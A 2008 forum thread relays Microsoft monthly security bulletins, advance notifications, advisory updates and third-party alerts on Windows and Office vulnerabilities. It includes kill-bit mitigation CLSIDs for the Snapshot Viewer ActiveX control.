Steps to take -before- you install Windows XP Service Pack 3
- http://support.microsoft.com/kb/950717/
Last Review: May 21, 2008 - Revision: 3.0 - "...Important
• If the configuration of your antivirus software prevents certain system files from being changed, the Windows XP SP3 installation may fail. Try temporarily disabling your antivirus software. To do this, right-click your antivirus program icon, and then click Disable. This icon typically appears in the lower right corner of the computer screen.
• If you disable your antivirus software before you install Windows XP SP3, make sure that you know the risks that are involved, and make sure that you enable the antivirus software after Windows XP SP3 is installed..."

:fear:

AplusWebMaster
2008-07-01, 13:52
FYI...

Microsoft Security Advisory (954960)
Microsoft Windows Server Update Services (WSUS) Blocked from Deploying Security Updates
- http://www.microsoft.com/technet/security/advisory/954960.mspx
June 30, 2008 - "Microsoft is investigating public reports of a non-security issue that prevents the distribution of any updates deployed through Microsoft Windows Server Update Services 3.0 or Microsoft Windows Server Update Services 3.0 Service Pack 1 to client systems that have Microsoft Office 2003 installed in their environment. Microsoft is aware of reports from customers who are experiencing this issue. Upon completing the investigation, Microsoft will take appropriate action to resolve the issue within Microsoft Windows Server Update Services 3.0 or Microsoft Windows Server Update Services 3.0 Service Pack 1.

Note: The issue affecting System Center Configuration Manager 2007 first described in Microsoft Security Advisory 954474, where System Center Configuration Manager 2007 systems were blocked from deploying security updates, is separate from the issue described in this advisory.
Mitigating Factors:
• This issue is limited to customers who deploy updates through Microsoft Windows Server Update Services 3.0 or Microsoft Windows Server Update Services 3.0 Service Pack 1, and have Microsoft Office 2003 installed in their environments..."

- http://preview.tinyurl.com/6xdp79
June 30, 2008 (MSRC blog)

:fear::spider:

AplusWebMaster
2008-07-04, 14:41
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms08-jul.mspx
July 3, 2008
This is an advance notification of security bulletins that Microsoft is intending to release on July 8, 2008...
[Total of 4]...

Important (4)

Bulletin Identifier: SQL Bulletin
Maximum Severity Rating:Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Microsoft Windows, Microsoft SQL Server...

Bulletin Identifier: Windows Bulletin 1
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Bulletin Identifier: Windows Bulletin 2
Maximum Severity Rating: Important
Impact of Vulnerability: Spoofing...
Affected Software: Microsoft Windows...

Bulletin Identifier: Exchange Server Bulletin
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Microsoft Exchange Server...

- http://blogs.technet.com/msrc/archive/2008/07/03/july-2008-monthly-release.aspx
July 03, 2008

AplusWebMaster
2008-07-08, 00:15
FYI...

Microsoft Security Advisory (955179)
Vulnerability in the ActiveX Control for the Snapshot Viewer for Microsoft Access Could Allow Remote Code Execution
- http://www.microsoft.com/TechNet/security/advisory/955179.mspx
July 7, 2008 - "Microsoft is investigating active, targeted attacks leveraging a potential vulnerability in the ActiveX control for the Snapshot Viewer for Microsoft Access. An attacker could exploit the vulnerability by constructing a specially crafted Web page. When a user views the Web page, the vulnerability could allow remote code execution. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. The ActiveX control for the Snapshot Viewer for Microsoft Access enables you to view an Access report snapshot without having the standard or run-time versions of Microsoft Office Access. The vulnerability only affects the ActiveX control for the Snapshot Viewer for Microsoft Office Access 2000, Microsoft Office Access 2002, and Microsoft Office Access 2003. The ActiveX control is shipped with all supported versions of Microsoft Office Access except for Microsoft Office Access 2007. The ActiveX control is also shipped with the standalone Snapshot Viewer...
Suggested Actions / Workarounds:
Microsoft has tested the following workarounds. Although these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, this is stated in the entry.
• Prevent COM objects from running in Internet Explorer
You can disable attempts to instantiate a COM object in Internet Explorer by setting the kill bit for the control in the registry..."

(Kill bit listings shown in the advisory at the URL above.)

:fear:

AplusWebMaster
2008-07-08, 22:00
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms08-jul.mspx
July 8, 2008 - "This bulletin summary lists security bulletins released for July 2008...

Important (4)

Microsoft Security Bulletin MS08-040
Vulnerabilities in Microsoft SQL Server Could Allow Elevation of Privilege (941203)
- http://www.microsoft.com/technet/security/bulletin/ms08-040.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Microsoft Windows, Microsoft SQL Server...

Microsoft Security Bulletin MS08-038
Vulnerability in Windows Explorer Could Allow Remote Code Execution (950582)
- http://www.microsoft.com/technet/security/bulletin/ms08-038.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-037
Vulnerabilities in DNS Could Allow Spoofing (953230)
- http://www.microsoft.com/technet/security/bulletin/ms08-037.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Spoofing...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-039
Vulnerabilities in Outlook Web Access for Exchange Server Could Allow Elevation of Privilege (953747)
- http://www.microsoft.com/technet/security/bulletin/ms08-039.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Microsoft Windows...

-
ISC Analysis
- http://isc.sans.org/diary.html?storyid=4684
Last Updated: 2008-07-08 18:22:23 UTC
---

MS08-038 exploit/fix available
- http://isc.sans.org/diary.html?storyid=4684
Last Updated: 2008-07-08 18:22:23 UTC
"...MS08-038 - Multiple vulnerabilities in Windows explorer allow code execution with the rights of the logged on user... Publicly disclosed... CVE-2008-0951* is a well known vulnerability: CERT VU#889747** (march 2008)..."
- http://www.microsoft.com/technet/security/bulletin/ms08-038.mspx
July 8, 2008
* http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0951
Last revised: 3/25/2008
** http://www.kb.cert.org/vuls/id/889747
First Published 03/20/2008
---
Updated / CVE references:
- http://isc.sans.org/diary.html?storyid=4684
Last Updated: 2008-07-09 08:21:40 UTC ...(Version: 3)
MS08-037: Windows DNS
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1447
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1454
MS08-038: Windows explorer / Vista
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1435
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0951
MS08-039: Exchange server
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-2247
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-2248
MS08-040: SQL server
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0085
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0086
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0106
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0107

//

:fear:

AplusWebMaster
2008-07-09, 05:55
FYI... updated:

- http://isc.sans.org/diary.html?storyid=4684
Last Updated: 2008-07-09 08:21:40 UTC ...(Version: 3)
"...MS08-037 - Windows DNS ...ZoneAlarm users report* trouble with their firewall set to "high" for the Internet zone..."

Update - Important! - see: http://forums.spybot.info/showpost.php?p=211128&postcount=78 -prior- to MS08-037 install.

** http://support.microsoft.com/?kbid=951748
MS08-037 ...Windows XP... (client side)

//

AplusWebMaster
2008-07-09, 22:54
FYI...

- http://www.theinquirer.net/gb/inquirer/news/2008/07/09/windows-xp-sp3-automatic
9 July 2008 - "AS ANNOUNCED previously by Microsoft, automatic updates for Windows XP SP3 will be launched Wednesday, July 10 2008, starting at 10:00 am Pacific Time. For most Windows XP users who haven't already manually downloaded and applied SP3, the automatic update process should work properly. After all, Microsoft has had almost three months to test, tweak and polish it since it was first released. Microsoft's Automatic Updates process should know about and scan for configurations that are problematic, and prevent the Windows XP SP3 update installation process from proceeding if it detects a troublesome situation. However, if there's any hiccough in the automatic update process, your computer could become unusable. Therefore, certain technical advisors recommend using Microsoft's Automatic Updates facility only to provide notification that the update is available, then applying it manually. They caution that you should also take care to follow Microsoft's service pack pre-installation instructions, including:
* Disable antivirus programs,
* Make sure no other applications are running,
* Have your system plugged in during the update, that is, not on battery power, and
* Make sure that you have sufficient free space available on your system's hard disk.
You can make certain that the Windows Automatic Update facility doesn't attempt to, er... automatically update your system by using Microsoft's Windows Service Pack Blocker Tool Kit, and that's available here: http://preview.tinyurl.com/2tadkt
Should you find that Windows XP SP3 causes problems on your system, instructions on how to remove it are available here: http://www.iaps.com/blog/2008/07/how-to-remove-windows-xp-service-pack-3.html ..."

//

AplusWebMaster
2008-07-11, 05:51
FYI...

Update 2: Microsoft Security Advisory (954960)
- http://blogs.technet.com/msrc/archive/2008/07/10/update-2-microsoft-security-advisory-954960.aspx
July 10, 2008 - "...customers running Windows Server Update Services 3.0 Service Pack 1 on Windows Server 2008 may experience an issue installing the update provided in Microsoft Knowledge Base Article 954960*. The update does not correctly elevate privileges, which are required for the installation to complete. In order to successfully install this update we have identified steps in Advisory 954960**. Additionally, the update does not place an entry in Add or Remove Programs, and cannot be uninstalled. Microsoft has identified the packaging inconsistencies in the current update and is investigating options to resolve them. We will continue to monitor the situation and post updates to the advisory and the MSRC blog as we become aware of any important new information..."
* http://support.microsoft.com/kb/954960
Last Review: July 11, 2008 -?-
Revision: 3.0

** http://www.microsoft.com/technet/security/advisory/954960.mspx
• July 10, 2008: Advisory updated to reflect specific installation and uninstallation procedures for the update for Windows Server Update Services running on Windows Server 2008.

//

AplusWebMaster
2008-07-11, 05:54
FYI...

- http://blogs.technet.com/msrc/archive/2008/07/10/revision-for-ms08-037.aspx
July 10, 2008 (MSRC) - "...After the release of MS08-037, we became aware of reports of ZoneAlarm customers experiencing issues after applying the security updates. We started investigating these reports as soon as we heard about them and have been working to research this issue. We’re still working on this issue but we do have some information from our investigation so far, which we’ve put into the bulletin. Specifically, we’ve identified that customers who are running either ZoneAlarm or Check Point Endpoint Security (previously named Check Point Integrity) who apply MS08-037 may lose network connectivity after applying these updates. Our investigation so far has shown that no other customers are affected by this issue. We’re still investigating this issue but we encourage customers who are using ZoneAlarm to review the appropriate ZoneAlarm Web site** and Check Point Endpoint customers to review the appropriate Check Point Web site*** for the latest guidance or software updates and factor this information into your risk assessment, testing, and deployment planning..."

* http://www.microsoft.com/technet/security/Bulletin/MS08-037.mspx
• V2.0 (July 10, 2008): Bulletin revised to inform users of ZoneAlarm and Check Point Endpoint Security of an Internet connectivity issue detailed in the section, Frequently Asked Questions (FAQ) Related to this Security Update. The revision did -not- change the security update files in this bulletin, but users of ZoneAlarm and Check Point Endpoint Security should read the FAQ entries for guidance.

** http://download.zonealarm.com/bin/free/pressReleases/2008/LossOfInternetAccessIssue.html
Last Revised : 14 July 2008

*** https://supportcenter.checkpoint.com/supportcenter/index.jsp

//

AplusWebMaster
2008-07-11, 17:12
FYI...

- http://www.symantec.com/security_response/threatconlearn.jsp
ThreatCon is currently at Level 2: Elevated.
Symantec honeypots have captured further exploitation of the Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download Vulnerability (BID 30114). Before this event, this exploit was known to be used only in isolated attacks. Further analysis of these honeypot compromises has revealed that the exploit has been added to a variant of the neosploit exploit kit, it will very likely reach a larger number of victims. This version will compromise vulnerable English versions of Microsoft Windows by downloading a malicious application into the Windows Startup folder. Computers that have Microsoft Access installed are potentially affected by this vulnerability. Customers are advised to manually set the kill bit on the following CLSIDs until a vendor update is available:
F0E42D50-368C-11D0-AD81-00A0C90DC8D9
F0E42D60-368C-11D0-AD81-00A0C90DC8D9
F2175210-368C-11D0-AD81-00A0C90DC8D9
...For information on setting the kill bit for CLSIDs, see the following: Microsoft Knowledge Base Article 240797 (Microsoft) Microsoft ( http://support.microsoft.com/kb/240797 ) For more information about the vulnerability, see the following: Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download Vulnerability ( http://www.securityfocus.com/bid/30114/references )"
[2008.07.11]

Ref: http://www.microsoft.com/TechNet/security/advisory/955179.mspx
Vulnerability in the ActiveX Control for the Snapshot Viewer for Microsoft Access Could Allow Remote Code Execution
July 7, 2008

:fear:

AplusWebMaster
2008-07-17, 22:59
FYI...

- http://isc.sans.org/diary.html?storyid=4747
Last Updated: 2008-07-17 18:48:22 UTC - "Microsoft has issued a "Security Bulletin Major Revision" involving its DirectX products. These revisions include the following two previously released bulletins and particularly affect administrative users as the resulting compromise allows the attacker to gain user rights.

MS08-033* - Vulnerabilities in DirectX Could Allow Remote Code Execution (951698) is rated as -critical- and states that DirectX 9.0 was added as affected software. This vulnerability can be exploited through a specially crafted media file.
* http://www.microsoft.com/technet/security/Bulletin/MS08-033.mspx
Updated: July 16, 2008 - Version: 2.0

MS07-064** - Vulnerabilities in DirectX Could Allow Remote Code Execution (941568) is also rated -critical- and has been updated to reflect DirectX 9.0 and 9.0a as affected software. This vulnerability can be exploited through a specially crafted media file via streaming."
** http://www.microsoft.com/technet/security/bulletin/ms07-064.mspx
Updated: July 16, 2008 - Version: 3.0

:fear:

AplusWebMaster
2008-07-26, 12:43
FYI...

Microsoft Security Advisory (956187)
Increased Threat for DNS Spoofing Vulnerability
- http://www.microsoft.com/technet/security/advisory/956187.mspx
July 25, 2008 - "Microsoft released Microsoft Security Bulletin MS08-037* on July 8, 2008, offering security updates to protect customers against Windows Domain Name System (DNS) spoofing attacks. Microsoft released this update in coordination with other DNS vendors who were also similarly impacted. Since the coordinated release of these updates, the threat to DNS systems has increased due to a greater public understanding of the attacks, as well as detailed exploit code being published on the Internet... attacks are likely imminent due to the publicly posted proof of concept..."
* http://www.microsoft.com/technet/security/bulletin/ms08-037.mspx
Updated: July 25, 2008
Version: 2.2

- http://support.microsoft.com/kb/953230
Last Review: July 25, 2008
Revision: 4.1

- http://securitylabs.websense.com/content/Alerts/3141.aspx
07.25.2008

//

AplusWebMaster
2008-08-02, 04:12
FYI...

- http://securitylabs.websense.com/content/Blogs/3148.aspx
08.01.2008 - "...We've been closely monitoring this exploit since its release, and are now tracking several hundred occurrences in the wild, found mostly in China. There is currently no patch available, but Microsoft has several workarounds listed in their advisory. We recommend setting the killbit for this ActiveX control on all workstations where it is installed.
Vulnerable ActiveX CLSIDs:
* F0E42D50-368C-11D0-AD81-00A0C90DC8D9
* F0E42D60-368C-11D0-AD81-00A0C90DC8D9
* F2175210-368C-11D0-AD81-00A0C90DC8D9
This vulnerability is a simple design flaw, and does not require any complicated exploit code. Attackers are able to compromise remote systems simply by calling methods provided by the Snapshot Viewer ActiveX control. This is very similar to the November 9, 2005 ADODB.Stream vulnerability, which was widely taken advantage of because it was easy to exploit. Luckily, the vulnerable ActiveX control does NOT appear in a default Microsoft Windows installation. It does appear, however, to be included by default with Microsoft Office 2000 - 2003."

- http://www.symantec.com/security_response/threatconlearn.jsp
"The ThreatCon is at level 2. On August 1, 2008, a new attack vector for the Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download Vulnerability (BID 30114) was identified being exploited in the wild. This vulnerability is currently unpatched. Microsoft Access ActiveX Control Arbitrary File Download Vulnerability ( http://www.securityfocus.com/bid/30114 ) Vulnerability in the ActiveX Control for the Snapshot Viewer for Microsoft Access ( http://www.microsoft.com/technet/security/advisory/955179.mspx ) The new attack vector allows an attacker to install a vulnerable version of the ActiveX control on target systems that did not originally contain the associated software. This is possible because the control is digitally signed and marked safe for scripting by Microsoft. This is known to affect users of Internet Explorer 6. Note that Internet Explorer 7 requires user interaction to confirm the installation of the ActiveX control. As a result of this discovery, we urge all Microsoft Windows users, even those whose systems do not currently have the vulnerable control installed, to set the kill bit on the three CLSIDs associated with Snapshot Viewer.
F0E42D50-368C-11D0-AD81-00A0C90DC8D9
F0E42D60-368C-11D0-AD81-00A0C90DC8D9
F2175210-368C-11D0-AD81-00A0C90DC8D9
For instructions on how to set the kill bit on an ActiveX control, please see the following article: Microsoft Knowledge Base Article 240797 (Microsoft) Microsoft ( http://support.microsoft.com/kb/240797 )."

:fear:

AplusWebMaster
2008-08-02, 19:40
FYI...

Microsoft Security Advisory (954960)
...WSUS Blocked from Deploying Security Updates
- http://www.microsoft.com/technet/security/advisory/954960.mspx
Updated: August 12, 2008

Some computers do not receive updates from the WSUS server
* http://support.microsoft.com/kb/954960
Last Review: August 12, 2008
Revision: 5.0

:fear:

AplusWebMaster
2008-08-08, 11:52
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms08-aug.mspx
August 7, 2008 - "This is an advance notification of security bulletins that Microsoft is intending to release on August 12, 2008... (Total of 12)

Critical (7)

Windows 1 Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

IE Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows, Internet Explorer...

Media Player Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Access Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Excel Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

PowerPoint Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Office Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

---

Important (5)

Windows 2 Bulletin
Maximum Severity Rating: Important
Impact of Vulnerability: Information Disclosure...
Affected Software: Microsoft Windows...

Windows 3 Bulletin
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

OE Bulletin
Maximum Severity Rating: Important
Impact of Vulnerability: Information Disclosure...
Affected Software: Microsoft Windows, Outlook Express, Windows Mail...

Messenger Bulletin
Maximum Severity Rating: Important
Impact of Vulnerability: Information Disclosure...
Affected Software: Microsoft Windows, Windows Messenger...

Word Bulletin
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution
Affected Software: Microsoft Office...

- http://blogs.technet.com/msrc/archive/2008/08/07/august-2008-advance-notification.aspx
August 07, 2008 - "...we are planning to release high-priority, non-security updates on Windows Update and Windows Server Update Services (WSUS) as well as high-priority, non-security updates on Microsoft Update and Windows Server Update Services (WSUS). You can get additional information, in the “Other Information” section of the Advanced Notification..."

//

AplusWebMaster
2008-08-12, 23:46
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms08-aug.mspx
August 12, 2008 - "This bulletin summary lists security bulletins released for August 2008..." (Total 11)

Critical (6)

Microsoft Security Bulletin MS08-046
Vulnerability in Microsoft Windows Image Color Management System Could Allow Remote Code Execution (952954)
- http://www.microsoft.com/technet/security/bulletin/MS08-046.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-045
Cumulative Security Update for Internet Explorer (953838)
- http://www.microsoft.com/technet/security/bulletin/MS08-045.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows, Internet Explorer...

Microsoft Security Bulletin MS08-041
Vulnerability in the ActiveX Control for the Snapshot Viewer for Microsoft Access Could Allow Remote Code Execution (955617)
- http://www.microsoft.com/technet/security/bulletin/MS08-041.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Microsoft Security Bulletin MS08-043
Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (954066)
- http://www.microsoft.com/technet/security/bulletin/MS08-043.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Microsoft Security Bulletin MS08-051
Vulnerabilities in Microsoft PowerPoint Could Allow Remote Code Execution (949785)
- http://www.microsoft.com/technet/security/bulletin/MS08-051.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Microsoft Security Bulletin MS08-044
Vulnerabilities in Microsoft Office Filters Could Allow Remote Code Execution (924090)
- http://www.microsoft.com/technet/security/bulletin/MS08-044.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Important (5)

Microsoft Security Bulletin MS08-047
Vulnerability in IPsec Policy Processing Could Allow Information Disclosure (953733)
- http://www.microsoft.com/technet/security/bulletin/MS08-047.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Information Disclosure...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-049
Vulnerabilities in Event System Could Allow Remote Code Execution (950974)
- http://www.microsoft.com/technet/security/bulletin/MS08-049.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-048
Security Update for Outlook Express and Windows Mail (951066)
- http://www.microsoft.com/technet/security/bulletin/MS08-048.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Information Disclosure...
Affected Software: Microsoft Windows, Outlook Express, Windows Mail...

Microsoft Security Bulletin MS08-050
Vulnerability in Windows Messenger Could Allow Information Disclosure (955702)
- http://www.microsoft.com/technet/security/bulletin/MS08-050.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Information Disclosure...
Affected Software: Microsoft Windows, Windows Messenger...

Microsoft Security Bulletin MS08-042
Vulnerability in Microsoft Word Could Allow Remote Code Execution (955048)
- http://www.microsoft.com/technet/security/bulletin/MS08-042.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

---

ISC Analysis
- http://isc.sans.org/diary.html?storyid=4876
Last Updated: 2008-08-12 19:06:35 UTC

---
Revised (4):

Microsoft Security Bulletin MS08-022 – Critical
Vulnerability in VBScript and JScript Scripting Engines Could Allow Remote Code Execution (944338)
- http://www.microsoft.com/technet/security/Bulletin/MS08-022.mspx
• V2.0 (August 12, 2008): Added known issues link. Also added an entry to the section, Frequently Asked Questions (FAQ) Related to this Security Update, about the known issues and solutions. The solutions include a deployment change for this security update for one issue and a workaround for another. Customers who have successfully updated their systems do not need to reinstall this update.

Microsoft Security Bulletin MS08-033 – Critical
Vulnerabilities in DirectX Could Allow Remote Code Execution (951698)
- http://www.microsoft.com/technet/security/Bulletin/MS08-033.mspx
• V2.1 (August 12, 2008): Added known issues link. Also added an entry to the section, Frequently Asked Questions (FAQ) Related to this Security Update, about the known issues and solutions. The solutions include a change to Microsoft Baseline Security Analyzer (MBSA) 2.1 to correctly detect this update.

Microsoft Security Bulletin MS07-047 - Important
Vulnerabilities in Windows Media Player Could Allow Remote Code Execution (936782)
- http://www.microsoft.com/technet/security/Bulletin/MS07-047.mspx
• V2.0 (August 12, 2008): Added Windows XP Service Pack 3 as affected software. This is a detection change only; there were no changes to the binaries. Customers who have successfully updated their systems do not need to reinstall this update.

Microsoft Security Bulletin MS08-040 – Important
Vulnerabilities in Microsoft SQL Server Could Allow Elevation of Privilege (941203)
- http://www.microsoft.com/technet/security/Bulletin/MS08-040.mspx
• V1.6 (August 12, 2008): Added entry to the Frequently Asked Questions (FAQ) Related to this Security Update to communicate a change in the installation code for the security update for SQL Server 2005 Service Pack 2. This is an installation code change only. There were no changes to the security update binaries.

//

AplusWebMaster
2008-08-13, 15:44
FYI...

Microsoft Security Advisory (953839)
Cumulative Security Update of -ActiveX- Kill Bits
- http://www.microsoft.com/technet/security/advisory/953839.mspx
August 12, 2008 - "Microsoft is releasing a new set of ActiveX kill bits with this advisory. The update includes kill bits for the following third-party software:
• Aurigma Image Uploader. Aurigma has issued an advisory and an update that addresses vulnerabilities...
http://blogs.aurigma.com/post/2008/03/Official-security-bulletin.aspx ...
• HP Instant Support. HP has issued an advisory and an update that addresses vulnerabilities. Please see the advisory from HP for more information...
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01422264 ...
...Customers who are interested in learning more about this update should review Microsoft Knowledge Base Article 953839
- http://support.microsoft.com/kb/953839
August 12, 2008

- http://www.microsoft.com/technet/security/advisory/953839.mspx
• August 13, 2008: Updated to include links to HP’s Advisories
"...HP has issued -2- advisories..."
* http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01422264
** http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01439758

:fear:

AplusWebMaster
2008-08-22, 13:50
FYI...

MS08-051 V2.0 Patch issued August 20, 2008
- http://isc.sans.org/diary.html?storyid=4918
Last Updated: 2008-08-22 00:30:51 UTC - "Microsoft has posted new update packages, labeled Version 2, for Microsoft Office PowerPoint 2003 Service Pack 2 and Microsoft Office PowerPoint 2003 Service Pack 3" described in MS08-051*, Vulnerabilities in Microsoft PowerPoint Could Allow Remote Code Execution... Others should check with their patch management vendors. The original patch "contained incorrect versions of the binaries. While these versions did protect against the vulnerabilities discussed in the bulletin, they lacked other important security and reliability updates..."

* http://www.microsoft.com/technet/security/bulletin/ms08-051.mspx
• V2.0 (August 20, 2008): ...Customers who manually installed Version 1 of this update from Microsoft Download Center need to reinstall Version 2 of this update. Customers who have installed this update using Microsoft Update or Office Update do not need to reinstall..."

:fear:

AplusWebMaster
2008-09-05, 01:37
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms08-sep.mspx
September 4, 2008 - "...This is an advance notification of security bulletins that Microsoft is intending to release on September 9, 2008 (Total of -4-)...

Critical (4)

Windows Media Player Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows.

Windows Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows, Internet Explorer, .NET Framework, Messenger, Office, SQL Server, Visual Studio.

Windows Media Encoder Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows.

Office Bulletin
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

AplusWebMaster
2008-09-09, 03:08
FYI...

Gotcha: IE8 Lock-In With XP SP3
- http://www.wservernews.com/?id=690
Sep 1, 2008 - "...Redmond on its IE blog* warned XP SP3 users that in some circumstances they will not be able to uninstall either SP3 or IE8. This heads-up was similar to an earlier warning in May, when XP SP3 had just been released. Redmond said then that you wouldn't be able to downgrade from IE7 to the older IE6 browser without uninstalling SP3. Jane Maliouta, an IE program manager, gave specifics about this new gotcha, which impacts you when you downloaded and installed IE8 Beta 1 prior to updating XP to SP3. If you then upgrade IE8 to Beta 2, which Redmond unveiled on the 28th, you will be stuck with both IE8 and Windows XP SP3. You will get a warning dialog:
"If you continue, XP SP3 and IE8 Beta 2 will become permanent, you will still be able to upgrade to later IE8 builds as they become available, but you won't be able to uninstall them."
So how to get around this lock-in? First uninstall XP SP3, then uninstall IE8 Beta 1; then reinstall XP SP3 and follow that by installing IE8 Beta 2. Dang, that's a hassle..."
* http://blogs.msdn.com/ie/archive/2008/08/27/upgrading-to-internet-explorer-8-beta-2.aspx

:thud: :fear:

AplusWebMaster
2008-09-09, 22:27
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS08-sep.mspx
September 9, 2008 - "The security bulletins for this month are as follows, in order of severity: (Total of -4-)

Critical (4)

Microsoft Security Bulletin MS08-054
Vulnerability in Windows Media Player Could Allow Remote Code Execution (954154)
- http://www.microsoft.com/technet/security/Bulletin/ms08-054.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-052
Vulnerabilities in GDI+ Could Allow Remote Code Execution (954593)
- http://www.microsoft.com/technet/security/Bulletin/ms08-052.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows, Internet Explorer, .NET Framework, Office, SQL Server, Visual Studio...

Microsoft Security Bulletin MS08-053
Vulnerability in Windows Media Encoder 9 Could Allow Remote Code Execution (954156)
- http://www.microsoft.com/technet/security/Bulletin/ms08-053.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-055
Vulnerability in Microsoft Office Could Allow Remote Code Execution (955047)
- http://www.microsoft.com/technet/security/Bulletin/ms08-055.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

---
ISC Analysis:
- http://isc.sans.org/diary.html?storyid=5009
Last Updated: 2008-09-09 17:46:41 UTC

- http://blogs.technet.com/swi/
Sep. 9, 2008

---
MS08-052
- http://secunia.com/advisories/31675/

MS08-053
- http://secunia.com/advisories/31724/

MS08-054
- http://secunia.com/advisories/31726/

MS08-055
- http://secunia.com/advisories/31744/

---
Revisions...

MS08-052:
- http://www.microsoft.com/technet/security/Bulletin/ms08-052.mspx
• V2.0 (September 12, 2008): Bulletin updated to add Microsoft Office Project 2002 Service Pack 2, all Office Viewer software for Microsoft Office 2003, and all Office Viewer software for 2007 Microsoft Office System as Affected Software...

MS08-053:
- http://www.microsoft.com/technet/security/Bulletin/ms08-053.mspx
• V1.1 (September 10, 2008): Corrected the "Installing without user intervention" and "Installing without restarting" switches in the Security Update Deployment sections for Windows Vista and Windows Server 2008. Also changed "C:\Program Files" to "%programfiles%" in the Workarounds for Windows Media Encoder Buffer Overrun Vulnerability - CVE-2008-3008 commands.

MS08-054:
- http://www.microsoft.com/technet/security/Bulletin/ms08-054.mspx
• V1.1 (September 10, 2008): Removed erroneous entry from Mitigating Factors for Windows Media Player Sampling Rate Vulnerability - CVE-2008-2253.

MS08-055:
- http://www.microsoft.com/technet/security/Bulletin/ms08-055.mspx
• V1.1 (September 10, 2008): Corrected the installation switches and deployment information for OneNote 2007, and added to the list of non-affected software. Also, updated FAQ entries explaining why this update is offered to systems with non-affected software.

:-(

AplusWebMaster
2008-09-19, 16:54
FYI...

- http://www.symantec.com/security_response/threatconlearn.jsp
